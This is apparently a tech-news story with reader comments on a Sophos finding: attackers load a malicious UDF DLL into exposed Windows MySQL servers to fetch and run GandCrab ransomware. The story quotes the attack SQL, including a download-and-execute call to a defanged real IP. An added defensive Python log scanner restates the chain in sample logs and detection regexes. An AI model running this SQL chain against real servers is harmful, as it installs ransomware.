from the don't-do-that dept.
Sophos has uncovered a wave of attacks targeting servers running MySQL on Windows.
The attack delivers the GandCrab ransomware.
The attackers attempt to connect to the database server and establish that it is running a MySQL instance.
Then the attacker uses the "set" command to load all the bytes composing the helper DLL into memory in a variable, and writes the contents of that variable out to a database table named yongger2.
The attacker concatenates the bytes into one file and drops them into the server's plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.
The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:
CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
The command to invoke the xpdl3 function is:
select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')
Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.
Tracking back through the attack chain, the researchers determined that the malware had been downloaded from the source ~3100 times since mid April. Each download potentially indicates an infection, although presumably some were, as in Sophos' case, honeypots where no actual damage was done. The user interface of the system (geolocated in Arizona) hosting the malware is in simplified Chinese.
While not a widespread attack by numbers, it does represent a significant risk to MySQL databases exposed online.
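As an added example, not code from the article or from Sophos, the following Python scans MySQL general-log lines for the stages of the UDF-loading chain described above, so a defender can spot the pattern in their own server logs. The log lines are constructed (placeholder URL and timestamps), and the script assumes the DLL bytes are written to the plugin directory with SELECT ... INTO DUMPFILE, which the article does not state.

```python
import re

# Constructed general-log sample (not from the Sophos report); the statements
# follow the chain in the article: hex blob into a variable, staged in a table,
# written to the plugin directory, registered as a UDF, then called with a URL.
SAMPLE_LOG = """\
2019-05-20T10:01:02.000Z   12 Connect   root@203.0.113.9 on  using TCP/IP
2019-05-20T10:01:03.000Z   12 Query     SET @a = CONCAT('', 0x4d5a90000300000004000000ffff0000)
2019-05-20T10:01:04.000Z   12 Query     CREATE TABLE yongger2 (data LONGBLOB)
2019-05-20T10:01:05.000Z   12 Query     INSERT INTO yongger2 VALUES (@a)
2019-05-20T10:01:06.000Z   12 Query     SELECT data FROM yongger2 INTO DUMPFILE 'C:/Program Files/MySQL/lib/plugin/cna12.dll'
2019-05-20T10:01:07.000Z   12 Query     DROP TABLE yongger2
2019-05-20T10:01:08.000Z   12 Query     CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
2019-05-20T10:01:09.000Z   12 Query     select xpdl3('http://example.invalid/3306-1.exe','c:\\\\isetup.exe')
2019-05-20T10:02:00.000Z   13 Query     SELECT id, name FROM customers WHERE id = 42
"""

# (rule name, regex) pairs, ordered along the chain; hits on the later rules
# are rarer in legitimate traffic and therefore higher confidence.
RULES = [
    ("hex-blob-to-variable", re.compile(r"\bSET\s+@\w+\s*=.*0x[0-9a-f]{16,}", re.I)),
    ("dumpfile-to-plugin-dir", re.compile(r"INTO\s+DUMPFILE\s+'[^']*plugin[^']*'", re.I)),
    ("udf-registration", re.compile(r"CREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\s+'", re.I)),
    ("udf-called-with-url", re.compile(r"\b\w+\s*\(\s*'(?:hxxp|http|ftp)s?://", re.I)),
]

def scan_general_log(text):
    """Return (connection_id, rule_name, statement) for every suspicious Query line."""
    findings = []
    for line in text.splitlines():
        m = re.match(r"\S+\s+(\d+)\s+Query\s+(.*)$", line)
        if not m:
            continue  # Connect/Quit and other non-query events are skipped
        conn_id, stmt = m.group(1), m.group(2)
        for name, rx in RULES:
            if rx.search(stmt):
                findings.append((conn_id, name, stmt))
    return findings

def connections_with_udf_chain(findings, min_stages=2):
    """Connection ids that hit at least min_stages distinct rules: one stage alone
    (e.g. a legitimate CREATE FUNCTION ... SONAME) is worth a look, several in
    one session is the loader pattern."""
    stages = {}
    for conn_id, name, _ in findings:
        stages.setdefault(conn_id, set()).add(name)
    return sorted(c for c, s in stages.items() if len(s) >= min_stages)

if __name__ == "__main__":
    for conn_id, name, stmt in scan_general_log(SAMPLE_LOG):
        print(f"conn {conn_id}: {name}: {stmt}")
    print("sessions showing the chain:", connections_with_udf_chain(scan_general_log(SAMPLE_LOG)))
```

Running it over a real general log needs only that the server has general_log enabled; the same rules apply to audit-plugin output once the statement text is extracted.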
(Score: 2) by The Mighty Buzzard on Monday May 27, @09:27PM
Who in the cornbread hell allows anonymous Internet access to their database servers?
Oh, right. Nevermind.
(Score: 0) by Anonymous Coward on Monday May 27, @09:42PM (2 children)
Great article, thanks randomfactor.
Also, Buzz, sometimes attackers have a foothold inside the local network, at which point yes they can see the sql db, because if the prod network can't see it then it's effectively down and things using it will fail. So while this might not be exposing smart admins' dbs directly, it sure does weaken things, because who knows what Joe or Jane Dev has installed, and their machine can reach the db.
(Score: 2) by edIII on Monday May 27, @09:53PM
Good point about the internal network, but if you're serious about security, database servers are on their own internal network. These things can be separated out so that an employee computer has no access whatsoever to other sensitive internal networks.
Still though, this is Windows. If anybody has access to an internal network with Windows machines running, it's akin to a fox having the run of the hen house. There's a reason why you don't directly connect a Windows server to the Internet.
(Score: 2) by NotSanguine on Monday May 27, @10:00PM
Even so, how does an anonymous connection have the privileges to add and drop tables/functions, *let alone* write data directly to the filesystem?
I did read TFA and they don't mention any attempts at bypassing authentication. At the same time, the "compromise" of the Sophos MySQL instance wasn't actually on an instance of MySQL. Rather it was a honeypot that just accepted any connections/commands sent to it.
I'd expect that any MySQL instance that allows such access has either not been secured and/or poor configuration made this possible. Add/drop and filesystem access privileges on MySQL should be restricted to root and MySQL users *explicitly* granted such privileges.
I'm glad I don't run MySQL and use MariaDB instead. :)